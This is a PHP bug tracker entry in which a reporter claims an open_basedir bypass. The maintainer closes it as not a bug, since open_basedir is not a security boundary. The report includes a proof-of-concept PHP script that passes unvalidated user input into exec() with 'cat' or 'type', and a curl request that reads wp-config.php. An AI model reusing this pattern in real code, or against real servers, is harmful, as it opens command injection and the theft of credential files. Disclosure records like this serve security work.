PHP :: Sec Bug #81715 :: Apache + PHP <= 8.1.4 open

Sec Bug #81715	Apache + PHP <= 8.1.4 open_basedir bypass‏‏
Submitted:	2022-04-06 19:14 UTC	Modified:	2022-04-07 09:46 UTC
From:	phpforwork at gmail dot com	Assigned:	cmb (profile)
Status:	Not a bug	Package:	*Directory/Filesystem functions
PHP Version:	8.1.4	OS:	Linux/Windows
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	phpforwork at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2022-04-06 19:14 UTC] phpforwork at gmail dot com

Description:
------------
Description:
=============
open_basedir security feature can be bypassed and read the file outside the open_basedir path.


Proof of Concept
================
0. The target file you want to read C:/xampp/htdocs/wp-config.php
1. Set open_basedir as a security feature in php.ini file :
open_basedir = C:/xampp/htdocs/test
2. Make a PHP script, "bypass.php" inside folder *test* :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>
3. Call the script :
curl localhost/test/bypass.php?file=../wp-config.php
4. You will see the full content of the file here : result.txt

Tested with PHP 5.6.3 and 7.x. and 8.x.
=====================

Reported by : Saleh 0xHunter ( twitter.com/0xhunter )

Test script:
---------------
For Windows webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2022-04-07 09:46 UTC] cmb@php.net

-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb

[2022-04-07 09:46 UTC] cmb@php.net

From the PHP manual[1]:

| open_basedir is just an extra safety net, that is in no way
| comprehensive, and can therefore not be relied upon when security
| is needed.

Consequently, our security classification[2] doesn't regard
open_basedir bypasses as security issues.

External programs just don't know about open_basedir.  For several
reasons, user input that is passed to any of the program execution
functions needs to be thoroughly validated by the userland script;
in this case you want to introduce some allow-list and verify that
the supplied path is in that list, and otherwise reject the
request.

[1] <https://www.php.net/manual/en/ini.core.php#ini.open-basedir>
[2] <https://wiki.php.net/security>

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Fri Oct 24 23:00:01 2025 UTC